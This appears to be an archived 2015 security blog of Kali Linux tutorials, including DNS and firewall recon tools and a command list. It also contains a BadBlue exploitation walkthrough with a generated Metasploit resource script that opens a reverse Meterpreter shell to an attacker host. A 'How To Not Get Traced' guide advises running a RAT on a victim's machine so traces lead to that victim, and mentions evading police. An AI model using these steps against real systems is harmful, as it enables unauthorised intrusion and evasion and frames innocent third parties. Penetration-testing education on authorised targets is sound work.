Sunday, 14 June 2015

Managing Kali Linux Services

Kali Linux is a specialized Linux distribution aimed at security professionals. As such, it contains several non-standard features. The default Kali installation ships with several services preinstalled, such as SSH, HTTP, MySQL, etc. If left untouched, these services would load at boot time, which would result in Kali Linux exposing several open ports by default, something we want to avoid for security reasons. Kali deals with this issue by updating our settings to prevent network services from starting at boot time.
   
     The following module will discuss some of these services, as well as how to operate and manage them.

Default root Password:- 

If you installed Kali from an image file, the installation process should have prompted you for a root password. If you are using the Kali Linux VMware image, as recommended, the default root password is "toor". Make sure to change any default or weak passwords to something long, complex, and secure before starting any services such as SSH: a listening sshd that accepts root logins with the password "toor" is the first thing anyone on the same network will try. The root password can be changed with the passwd command (run passwd as root and enter the new password twice). Note that this applies to the Kali 1.x images discussed here; Kali releases from 2020.1 onwards install a non-root default user instead of a default root password.




SSH Service:- 

The Secure Shell (SSH) service is most commonly used to remotely access a computer, using a secure, encrypted protocol. However, as we will see later on in the course, the SSH protocol has some surprising and useful features beyond providing terminal access. The SSH service is TCP-based and listens by default on port 22. To start the SSH service in Kali, type the following command into a Kali terminal:

service ssh start

We can verify that the SSH service is running and listening on TCP port 22 by using the netstat command and piping the output into the grep command to search the output for sshd:

netstat -antp | grep sshd

If, like many users, you want to have the SSH service start automatically at boot time, you need to enable it using the update-rc.d script as follows. The update-rc.d script can be used to enable and disable most services within Kali Linux:

update-rc.d ssh enable

On Kali releases that use systemd (Kali 2.0 and later) the equivalent is systemctl enable ssh. Whichever you use, enable only the services you actually need, since anything enabled here is reachable on the network every time the machine boots, and do it only after the root password has been changed.



HTTP Service:-

The HTTP service can come in handy during a penetration test, either for hosting a site or for providing a platform from which to download files to a victim machine. The HTTP service is TCP-based and listens by default on port 80. To start the HTTP (Apache) service in Kali, type the following command into a terminal:

service apache2 start

As we did with the SSH service, we can verify that the HTTP service is running and listening on TCP port 80 by using the netstat and grep commands once again:

netstat -antp | grep apache2

To have the HTTP service start at boot time, much like with the SSH service, you need to explicitly enable it with update-rc.d:

update-rc.d apache2 enable

Remember that anything you place in the web root is served to anyone who can reach port 80, so stop the service (service apache2 stop) when you no longer need it.
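The check the post does by hand with netstat and grep can be turned into a small audit that lists every listening TCP port and flags the ones you did not intend to expose. The script below is an added example written for this page, not part of the original post or of Kali; it parses netstat -ant style output from stdin so it can be run on a sample, and the netstat output embedded in it is constructed, not captured from a real host.

```shell
#!/bin/sh
# Added example, not part of the original post: a small port audit in the
# spirit of "netstat -antp | grep sshd". It reads netstat -ant output from
# stdin and reports any LISTEN port that is not on an allow list, so you can
# confirm that only the services you deliberately started are exposed.
# The netstat output below is constructed for the example, not captured.

# listening_ports: print the local TCP ports in LISTEN state, one per line.
# netstat -ant lines look like: "tcp  0  0 0.0.0.0:22  0.0.0.0:*  LISTEN"
# The last ":"-separated part of column 4 is the port (also works for ":::22").
listening_ports() {
    awk '$1 ~ /^tcp/ && $6 == "LISTEN" { n = split($4, a, ":"); print a[n] }' \
        | sort -n | uniq
}

# unexpected_ports ALLOWED: read netstat output on stdin and print every
# listening port that is not in the space-separated ALLOWED list.
# Returns 1 if any unexpected port was found, 0 otherwise.
unexpected_ports() {
    allow=" $1 "
    found=0
    for p in $(listening_ports); do
        case "$allow" in
            *" $p "*) ;;                  # expected, say nothing
            *) echo "$p"; found=1 ;;      # not on the allow list
        esac
    done
    return "$found"
}

# Constructed sample: sshd on 22 (v4 and v6), apache2 on 80, mysqld bound to
# localhost on 3306, plus one established SSH session that must be ignored.
SAMPLE_NETSTAT='Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address           Foreign Address         State       PID/Program name
tcp        0      0 0.0.0.0:22              0.0.0.0:*               LISTEN      1234/sshd
tcp        0      0 0.0.0.0:80              0.0.0.0:*               LISTEN      1300/apache2
tcp        0      0 127.0.0.1:3306          0.0.0.0:*               LISTEN      1350/mysqld
tcp        0      0 10.0.0.5:22             10.0.0.9:51512          ESTABLISHED 1400/sshd
tcp6       0      0 :::22                   :::*                    LISTEN      1234/sshd'

# Stand-alone demo. On a live Kali box replace the printf with:
#   netstat -antp | unexpected_ports "22"
# (ss -tlnp prints different columns, so the awk above is netstat-specific.)
if printf '%s\n' "$SAMPLE_NETSTAT" | unexpected_ports "22"; then
    echo "only the expected ports are listening"
else
    echo "unexpected listening ports found (listed above)"
fi
```

Run it with only the ports you started on the allow list; anything it prints is a service that is listening without your having decided it should, which is exactly the situation Kali's no-services-at-boot default is meant to prevent. The 3306 entry in the sample is bound to 127.0.0.1 and so is not reachable from the network, but it is still worth knowing about, so the script reports it rather than silently trusting the bind address.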




Saturday, 13 June 2015

How to Hack Windows 7 using the BadBlue exploit

Introduction of BadBlue :-

BadBlue is a small personal web server for Windows that is mostly used for file sharing, and many organizations use it for exactly that. Old versions of it (2.72b, the version the Metasploit module below targets) contain a buffer overflow in the PassThru functionality of the web server, which lets an attacker run code on the Windows host remotely. So a Windows 7 machine that runs this software can be taken over by a hacker. How? Let's see.


Steps:-

1. Start the Metasploit Framework by typing "msfconsole" in a terminal.

2. Type "search badblue" at the msf prompt and hit enter.

3. Now type "use exploit/windows/http/badblue_passthru" and hit enter.

4. Set the arguments the exploit requires. Type "show options" and it will list the arguments you need to set; at minimum that is the target address, plus the payload and your own listener address if you want a reverse Meterpreter session.

5. Type "set rhost <ip_address of victim>" and hit enter.

6. Finally, type "exploit" to attack the victim remotely.

7. When you get a meterpreter session you are on the victim's system. Type "sysinfo" to see information about the victim, and type "shell" to interact with the victim's cmd. If the exploit returns without a session, check that the target really runs the vulnerable BadBlue version and that it is listening on the port you set (the module defaults to port 80).
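The seven steps above are easier to repeat (and to audit afterwards) as a Metasploit resource script than as commands typed one at a time. The script below is an added example written for this page, not the post's own commands and not part of Metasploit: it validates the two addresses and then prints an .rc file for the module named in the post. The module path and the rhost option are the ones the post uses; PAYLOAD, LHOST and LPORT are the extra options "show options" asks for with a reverse Meterpreter payload (4444 is Metasploit's usual default LPORT), and the 192.0.2.x addresses are documentation addresses, not real hosts.

```shell
#!/bin/sh
# Added example, not from the original post: wrap the msfconsole steps above
# in a Metasploit resource script so the run is repeatable and both addresses
# are checked before anything is fired. Module path and RHOST follow the post;
# PAYLOAD/LHOST/LPORT are the options a reverse Meterpreter session needs.

# valid_ipv4 ADDR: exit 0 if ADDR is a dotted-quad IPv4 address, 1 otherwise.
valid_ipv4() {
    printf '%s\n' "$1" | awk -F. '
        NF != 4 { exit 1 }
        { for (i = 1; i <= 4; i++) if ($i !~ /^[0-9]+$/ || $i > 255) exit 1 }'
}

# badblue_rc RHOST LHOST [LPORT]: print a resource script that runs
# exploit/windows/http/badblue_passthru against RHOST and sends the
# reverse Meterpreter back to LHOST:LPORT. Fails (exit 1) on a bad address.
badblue_rc() {
    rhost=$1 lhost=$2 lport=${3:-4444}
    valid_ipv4 "$rhost" || { echo "badblue_rc: bad RHOST '$rhost'" >&2; return 1; }
    valid_ipv4 "$lhost" || { echo "badblue_rc: bad LHOST '$lhost'" >&2; return 1; }
    cat <<EOF
use exploit/windows/http/badblue_passthru
set RHOST $rhost
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST $lhost
set LPORT $lport
show options
exploit
EOF
}

# Usage on Kali (192.0.2.x are documentation addresses, not real hosts):
#   badblue_rc 192.0.2.10 192.0.2.50 > badblue.rc
#   msfconsole -q -r badblue.rc
# Once a session opens, "sysinfo" and "shell" work as described in the post.
badblue_rc 192.0.2.10 192.0.2.50
```

Keeping "show options" in the script means the resolved settings are printed just before "exploit", so the console log shows exactly what was sent to which host; that is the record you want when the test is written up.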


Friday, 5 June 2015

Load Balancing Detector (lbd) in Kali Linux

Introduction


Load Balancing Detector (lbd) is a tool which checks whether a given domain uses load balancing or not. Pentesters use it mainly to find out whether a site sits behind a load balancer, which affects how easily the site could be knocked offline by a DoS attack and explains why repeated requests may be answered by different back-end servers.

Objectives

In this tutorial we will learn how to use Load Balancing Detector (lbd).

Procedure

How to open it :-

Open lbd through Kali Linux >> Information Gathering >> IDS IPS Identification >> lbd



How to use it :-


·      To use it, run: /usr/bin/lbd [domain]
·      The tool first checks for DNS load balancing (the name resolving to several addresses) and then for HTTP load balancing (response headers that differ between repeated requests to the same URL).
·      Finally, it shows the result for both checks.
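The two checks lbd runs can be reproduced by hand with dig and curl, which is useful when you want to see the evidence rather than just a yes/no. The script below is an added example written for this page, not lbd's code: it takes "dig +short A" output and a series of response headers from stdin and applies the two strongest signals (several A records; a Server header that changes between requests). lbd also compares other headers and Date skew, which this example leaves out; the dig and curl output embedded in it is constructed, and 192.0.2.0/24 is a documentation range.

```shell
#!/bin/sh
# Added example, not part of the original post: the two checks lbd runs, done
# by hand. DNS-based load balancing shows up as several A records for one name
# (dig +short A); HTTP-based load balancing shows up as the Server header
# changing across repeated requests to the same URL. The samples below are
# constructed; a real run feeds in dig and curl output instead.

# dns_lb: read "dig +short A name" output on stdin; succeed if it holds more
# than one IPv4 address (the name resolves to several hosts).
dns_lb() {
    n=$(grep -Ec '^[0-9]+\.[0-9]+\.[0-9]+\.[0-9]+$' || true)
    [ "$n" -gt 1 ]
}

# http_lb: read the headers of several responses on stdin (one "curl -sI URL"
# per request, separated by a "---" line) and succeed if the Server header
# takes more than one distinct value, i.e. requests reached different back ends.
http_lb() {
    n=$(awk -F': ' 'tolower($1) == "server" { print $2 }' | sort -u | grep -c . || true)
    [ "$n" -gt 1 ]
}

# lb_report DIG_OUTPUT HEADERS: print one line summarising both checks.
lb_report() {
    dns=NO; http=NO
    printf '%s\n' "$1" | dns_lb && dns=YES
    printf '%s\n' "$2" | http_lb && http=YES
    echo "DNS-Loadbalancing: $dns  HTTP-Loadbalancing: $http"
}

# Constructed samples (192.0.2.0/24 is reserved for documentation).
DIG_BALANCED='192.0.2.10
192.0.2.11'
DIG_SINGLE='192.0.2.10'
HEADERS_BALANCED='HTTP/1.1 200 OK
Server: nginx/1.18.0
Content-Type: text/html
---
HTTP/1.1 200 OK
Server: Apache/2.4.41
Content-Type: text/html
---
HTTP/1.1 200 OK
Server: nginx/1.18.0
Content-Type: text/html'
HEADERS_SAME='HTTP/1.1 200 OK
Server: nginx/1.18.0
---
HTTP/1.1 200 OK
Server: nginx/1.18.0'

# Against a real target build the two inputs with
#   dig +short A www.example.com
#   for i in 1 2 3 4 5; do curl -sI https://www.example.com/; echo ---; done
lb_report "$DIG_BALANCED" "$HEADERS_BALANCED"
lb_report "$DIG_SINGLE" "$HEADERS_SAME"
```

A single A record and an unchanging Server header do not prove there is no load balancer (a balancer that rewrites the Server header on every response looks identical from outside), so treat a double NO as "no evidence" rather than "not balanced".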




Firewall Detection Tool Wafw00f in Kali Linux

Introduction

wafw00f is a Web Application Firewall detection tool.
It was written by Sandro Gauci and G. Henrique.

It helps you detect the WAF (Web Application Firewall) sitting in front of a domain.
Wiffit (wafw00f) can test for the firewalls listed in the image below.
If any firewall from that list is detected, it is displayed on screen.

How Wiffit (wafw00f) detects a Web Application Firewall (WAF)
To detect a WAF it sends a normal request followed by requests carrying obvious attack strings and looks at the following:
  • Cookies (session cookies that specific WAF products set)
  • Server cloaking (a rewritten or hidden Server header)
  • Response codes (a 403 or similar returned only for the malicious requests)
  • Drop action (the connection being dropped for malicious requests)
  • Pre-built rules (known signatures of specific products)

How to Open Wiffit on Kali Linux

Applications > Kali Linux > Information Gathering > IDS/IPS Identification > wafw00f

wafw00f is now open; see the image below for more details.



How to use wafw00f

Example 1:
Usage:
  root@root: wafw00f [target url]
Example:
  wafw00f www.***.com
This example shows that www.***.com is behind a Web Application Firewall.
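To see what the cookie, response-code and server-header checks above actually look at, here is an added example written for this page (not wafw00f's own code and not its signature database). It reads raw HTTP response headers, as captured with curl -sI, and flags three signals: a block-style status on a request carrying an attack string, a known WAF session cookie, and a WAF/CDN product in the Server header. The handful of cookie names and server strings it knows are a small hand-picked subset and the responses embedded in it are constructed, not captured from a real site.

```shell
#!/bin/sh
# Added example, not part of the original post: a hand-rolled version of the
# signals wafw00f looks for, applied to raw response headers. The signature
# list is a small assumed subset, not wafw00f's database.

# waf_signals: read one or more responses on stdin, print one line per signal.
waf_signals() {
    awk '
        $1 ~ /^HTTP\// && $2 ~ /^(403|406|429)$/ { print "status " $2 }
        tolower($1) == "set-cookie:" &&
            tolower($0) ~ /(__cfduid|incap_ses|visid_incap|ns_af)/ { print "cookie " $2 }
        tolower($1) == "server:" &&
            tolower($2) ~ /(cloudflare|awselb|bigip|sucuri)/ { print "server " $2 }
    '
}

# waf_verdict BENIGN_RESPONSE PROBE_RESPONSE: BENIGN is the reply to a plain
# GET, PROBE the reply to the same URL with an attack string appended, e.g.
#   curl -sI 'http://target/?q=<script>alert(1)</script>'
# Succeeds (exit 0) and prints the evidence when a WAF is likely.
waf_verdict() {
    b=$(printf '%s\n' "$1" | awk 'NR == 1 { print $2 }')
    p=$(printf '%s\n' "$2" | awk 'NR == 1 { print $2 }')
    sig=$(printf '%s\n%s\n' "$1" "$2" | waf_signals | sort -u)
    # A product signature anywhere, or a benign 200 turning into a non-200
    # on the probe, is enough to report "likely".
    if [ -n "$sig" ] || { [ "$b" = 200 ] && [ "$p" != 200 ]; }; then
        printf 'WAF likely (benign=%s, probe=%s)\n' "$b" "$p"
        printf '%s\n' "$sig" | sed '/^$/d; s/^/  signal: /'
        return 0
    fi
    printf 'no WAF signal (benign=%s, probe=%s)\n' "$b" "$p"
    return 1
}

# Constructed sample responses.
BENIGN_RESP='HTTP/1.1 200 OK
Server: cloudflare
Set-Cookie: __cfduid=d1e2f3; path=/; HttpOnly
Content-Type: text/html'
PROBE_RESP='HTTP/1.1 403 Forbidden
Server: cloudflare
Content-Type: text/html'
PLAIN_RESP='HTTP/1.1 200 OK
Server: Apache/2.4.41 (Ubuntu)
Content-Type: text/html'

waf_verdict "$BENIGN_RESP" "$PROBE_RESP"
waf_verdict "$PLAIN_RESP" "$PLAIN_RESP" || true
```

The benign/probe pair matters more than any single signature: a site that answers 200 to a plain request and 403 to the same URL with a script tag in the query is filtering on content, whatever its Server header says, while a site that answers 403 to both is simply denying access to that path.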



Thursday, 4 June 2015

Useful Commands in Linux

A comprehensive list of commands needed when using Linux:

Command privileges.

    sudo command – run command as root
    sudo su – open a root shell
    sudo su user – open a shell as user
    sudo -k – forget your cached sudo password
    gksudo command – graphical sudo dialog (GNOME)
    kdesudo command – graphical sudo dialog (KDE)
    sudo visudo – edit /etc/sudoers safely (syntax is checked before saving)
    gksudo nautilus – file manager as root (GNOME)
    kdesudo konqueror – file manager as root (KDE)
    passwd – change your password 

Commands for Network

    ifconfig – display network interface information
    iwconfig – display wireless interface information
    sudo iwlist scan – scan for wireless networks
    sudo /etc/init.d/networking restart – restart networking
    (file) /etc/network/interfaces – manual network configuration
    ifup interface – bring an interface up
    ifdown interface – bring an interface down 

Commands for Display

    sudo /etc/init.d/gdm restart – restart X (GNOME)
    sudo /etc/init.d/kdm restart – restart X (KDE)
    (file) /etc/X11/xorg.conf – X configuration
    sudo dpkg-reconfigure -phigh xserver-xorg – reset the X configuration
    Ctrl+Alt+Bksp – reset the X display if it is frozen
    Ctrl+Alt+FN – switch to tty N
    Ctrl+Alt+F7 – switch back to the X display 

Commands for System Services.

    start service – start a service (Upstart)
    stop service – stop a service (Upstart)
    status service – check whether a service is running (Upstart)
    /etc/init.d/service start – start a service (SysV)
    /etc/init.d/service stop – stop a service (SysV)
    /etc/init.d/service status – check a service (SysV)
    /etc/init.d/service restart – restart a service (SysV)
    runlevel – show the current runlevel 

Commands for Firewall.

    ufw enable – turn on the firewall
    ufw disable – turn off the firewall
    ufw default allow – allow all incoming connections by default
    ufw default deny – drop all incoming connections by default (the safe choice; then allow only what you need)
    ufw status – show current rules and state
    ufw allow port – allow traffic on port
    ufw deny port – block port
    ufw deny from ip – block ip 

Commands for System.


    lsb_release -a – get the Ubuntu version
    uname -r – get the kernel version
    uname -a – get all kernel information 

Commands for Package Manager.


    apt-get update – refresh the list of available packages
    apt-get upgrade – upgrade all installed packages
    apt-get dist-upgrade – upgrade, also installing or removing packages as dependencies change
    apt-get install pkg – install pkg
    apt-get remove pkg – uninstall pkg
    apt-get autoremove – remove packages that are no longer needed
    apt-get -f install – try to fix broken dependencies
    dpkg --configure -a – try to fix a broken package
    dpkg -i pkg.deb – install the file pkg.deb
    (file) /etc/apt/sources.list – list of APT repositories 

Special packages.

    ubuntu-desktop – the standard Ubuntu desktop
    kubuntu-desktop – KDE desktop
    xubuntu-desktop – XFCE desktop
    ubuntu-minimal – core Ubuntu packages
    ubuntu-standard – the standard Ubuntu utilities
    ubuntu-restricted-extras – non-free, but useful
    kubuntu-restricted-extras – ditto for KDE
    xubuntu-restricted-extras – ditto for XFCE
    build-essential – packages needed to compile software
    linux-image-generic – latest generic kernel image
    linux-headers-generic – latest kernel headers 

Application commands.

    nautilus – file manager (GNOME)
    dolphin – file manager (KDE)
    konqueror – web browser and file manager (KDE)
    kate – text editor (KDE)
    gedit – text editor (GNOME)

How To Not Get Traced


First, you need to know what you need, right?

VPN

PuTTY

Tor

RDP

Proxy

RAT

SMAC

TrueCrypt

Magnet


---------------------------------------------------------------------------

First you want to buy a VPN; free VPNs are usually slow and far more likely to log or sell your traffic. I suggest Private Internet Access as a good VPN: they advertise no logs and private IPs.
If you want to save about $2, go ahead and buy nVPN instead.

These VPNs use the OpenVPN protocol, so you are going to need the OpenVPN client as well.

You will need to use a VPN while on Skype or you will be easily doxed.

---------------------------------------------------------------------------

PuTTY is essential for setting up an SSH connection to a VPS. If someone DDoSes your
VPN you can fall back to your SSH/VPS until your VPN comes back up.
SSH (used as a SOCKS tunnel with ssh -D) is also a good layer in your chain (more on that soon).

---------------------------------------------------------------------------

Tor Browser is a brilliant browser that is designed to stop internet spying.
A Tor circuit has 3 nodes, the entry (guard) node, a middle node and the exit node, which are good
layers in your chain.
These nodes are three different relays, so the site you visit only ever sees the exit node's IP, which reinforces your anonymity.

---------------------------------------------------------------------------

An RDP (Remote Desktop Protocol) box works like a SOCKS5 proxy in that it is hosted
on someone else's network, so your traffic appears to come from there. There are many free RDPs and some cost money.
You can also take over RDP servers yourself, though using a machine you have no authorisation on is a crime rather than an anonymity technique. This is also a vital layer in your chain.

---------------------------------------------------------------------------

A proxy is similar to a VPN, but a VPN encrypts all of your network traffic while a plain proxy
only forwards your browser's traffic and does not encrypt anything by itself. You can chain as many proxies as
you want by using a tool called Proxifier (a commercial Windows tool, not open source).

I have my own project coming along called SkypeGhost, which is a Skype
configuration file that routes Skype through a proxy of your choice. (Out soon!)

---------------------------------------------------------------------------

You will need a RAT for its reverse SOCKS5 feature: it routes your traffic through the victim's machine, so the
victim's IP shows up instead of yours and anyone doxing or tracing you ends up at him.
Most RATs have this feature. If you don't want to set up port forwarding you need
to use a PHP RAT.

---------------------------------------------------------------------------

SMAC is a tool like a VPN but for your MAC address: it spoofs your
MAC address, making it harder to trace you. Bear in mind that a MAC address never leaves the local network segment, so this only matters against whoever runs the LAN or Wi-Fi you are connected to. There are other alternatives
to SMAC, but I think this is the best for me.

---------------------------------------------------------------------------

TrueCrypt is a tool for encrypting your hard drive so that anyone who seizes it, or gets into your machine while it is powered off, cannot read it;
you can choose which drives to encrypt as you go. Note that TrueCrypt development stopped in 2014; VeraCrypt is the maintained successor.

---------------------------------------------------------------------------

A magnet is meant for running over your HDD to destroy the drive if the cops come.
In practice a hand-held magnet will not erase a modern hard drive; full-disk encryption plus a proper wipe is what actually protects the data.

---------------------------------------------------------------------------

Your chain should look like this:

RDP >> VPS/SSH >> VPN >> Reverse SOCKS5 >> your proxy chain >> Tor entry node >>
Tor middle node >> Tor exit node

Information Gathering With dnsrecon Kali Linux


DNSRecon is a DNS enumeration tool written in Python.
DNSRecon provides the ability to perform:
  • Check all NS records for zone transfers (AXFR)
  • Enumerate general DNS records for a given domain (MX, SOA, NS, A, AAAA, SPF and TXT)
  • Perform common SRV record enumeration
  • Top Level Domain (TLD) expansion
  • Check for wildcard resolution
  • Brute-force subdomain and host A and AAAA records given a domain and a wordlist
  • Perform a PTR record lookup for a given IP range or CIDR
  • Check a DNS server's cached records for A, AAAA and CNAME records, given a list of host records in a text file
  • Enumerate common mDNS records in the local network
  • Enumerate hosts and subdomains using Google
So Lets begin:-
      
Open dnsrecon through Kali Linux >> Information Gathering >> DNS Analysis >> dnsrecon




For the standard record enumeration (std), type: dnsrecon -t std -d youtube.com



For SRV record enumeration, type: dnsrecon -t srv -d gmail.com



For a zone transfer attempt against every name server (axfr), type: dnsrecon -t axfr -d saintangelos.com



For TLD expansion (tld), type: dnsrecon -t tld -d saintangelos.com

Of these, a successful axfr is the one to look for first: a name server that answers zone transfers for anyone hands over the full list of hosts in the domain in a single query.
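The axfr check is worth understanding on its own, because it is the one dnsrecon finding that is a misconfiguration in itself. The script below is an added example written for this page, not dnsrecon's code: it does what "dnsrecon -t axfr" does with dig, asking each authoritative server for the zone and parsing the result, so the answer can be read by hand. The two dig transcripts embedded in it are constructed (example.test is a reserved name and 192.0.2.0/24 and 2001:db8::/32 are documentation ranges); the check_zone function does real DNS lookups and is not run in the demo.

```shell
#!/bin/sh
# Added example, not part of the original post: the check behind
# "dnsrecon -t axfr", done with dig. A name server that answers AXFR for
# anyone hands over the whole zone, which is the finding dnsrecon reports.
# The two transcripts below are constructed; check_zone does real lookups.

# axfr_succeeded: read "dig axfr" output on stdin. A completed transfer starts
# and ends with the zone's SOA record; a refused one prints "; Transfer failed."
axfr_succeeded() {
    awk '/^; Transfer failed/ { fail = 1 }
         $3 == "IN" && $4 == "SOA" { soa++ }
         END { exit !(soa >= 2 && !fail) }'
}

# axfr_hosts: list the owner names of every A/AAAA record in the transfer,
# i.e. the host inventory the zone leaks, without the trailing dot.
axfr_hosts() {
    awk '$3 == "IN" && ($4 == "A" || $4 == "AAAA") { sub(/\.$/, "", $1); print $1 }' | sort -u
}

# check_zone DOMAIN: ask every authoritative server for the zone in turn.
check_zone() {
    for ns in $(dig +short NS "$1"); do
        if dig axfr "$1" "@$ns" | axfr_succeeded; then
            echo "$ns allows zone transfer of $1:"
            dig axfr "$1" "@$ns" | axfr_hosts | sed 's/^/  /'
        else
            echo "$ns refused zone transfer of $1"
        fi
    done
}

# Constructed transcripts in dig's output format.
AXFR_OK='; <<>> DiG 9.16.1 <<>> axfr example.test @ns1.example.test
;; global options: +cmd
example.test.        3600  IN  SOA   ns1.example.test. hostmaster.example.test. 2015061401 7200 3600 1209600 3600
example.test.        3600  IN  NS    ns1.example.test.
ns1.example.test.    3600  IN  A     192.0.2.1
www.example.test.    3600  IN  A     192.0.2.10
mail.example.test.   3600  IN  A     192.0.2.20
vpn.example.test.    3600  IN  AAAA  2001:db8::30
example.test.        3600  IN  SOA   ns1.example.test. hostmaster.example.test. 2015061401 7200 3600 1209600 3600
;; Query time: 3 msec'
AXFR_FAIL='; <<>> DiG 9.16.1 <<>> axfr example.test @ns2.example.test
;; global options: +cmd
; Transfer failed.'

# Stand-alone demo on the constructed transcripts.
printf '%s\n' "$AXFR_OK"   | axfr_succeeded && printf '%s\n' "$AXFR_OK" | axfr_hosts
printf '%s\n' "$AXFR_FAIL" | axfr_succeeded || echo "ns2: transfer refused"
```

Testing every NS record separately matters: zones are often served by several providers, and it only takes one secondary with a permissive allow-transfer setting for the whole zone to be readable, which is why dnsrecon's axfr mode iterates over all of them rather than querying the resolver you happen to be using.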